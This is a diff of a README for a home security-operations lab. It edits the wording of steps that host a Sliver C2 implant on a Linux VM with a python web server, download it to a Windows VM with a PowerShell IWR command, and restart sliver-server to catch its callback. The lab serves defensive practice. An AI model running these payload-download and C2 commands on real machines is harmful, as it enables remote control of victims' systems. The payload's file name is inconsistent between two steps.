Lantern76/SOC-Lab/README.md

   ![3](https://github.com/Lantern76/SOC-Lab/assets/119342094/b7064aaf-9dca-4a98-be00-011422b3f89e)

-  5. Now we have a C2 payload we can drop onto our Windows VM.
-We’ll do that next.
-Go ahead and exit Sliver for now
+  5. Now I have a C2 payload I can drop onto my Windows VM.
+I’ll do that next.
+First, I will go ahead and exit Sliver
        - exit
-  6. To easily download the C2 payload from the Linux VM to the Windows VM, let’s use a little python trick that spins up a temporary web server
+  6. To easily download the C2 payload from the Linux VM to the Windows VM, I will use a little python trick that spins up a temporary web server
        - cd /opt/sliver
        - python3 -m http.server 80
-  7. Switch to the Windows VM and launch an Administrative PowerShell console
+  7. Next is to switch to the Windows VM and launch an Administrative PowerShell console
   8. Now I run the following command to download my C2 payload from the Linux VM to the Windows VM, using my own Linux VM IP and the name of the payload I generated in Sliver, RAPID_PLENTY.exe, a few steps prior
        - IWR -Uri http://[Linux_VM_IP]/REGULAR_PLENTY.exe -Outfile C:\Users\User\Downloads\REGULAR_PLENTY.exe
-  9. Now that the payload is on the Windows VM, we must switch back to the Linux VM SSH session and enable the Sliver HTTP server to catch the callback
+  9. Now that the payload is on the Windows VM, I must switch back to the Linux VM SSH session and enable the Sliver HTTP server to catch the callback
        - First I need to terminate the python web server by pressing Ctrl + c
        - Next is to relaunch Sliver
            - sliver-server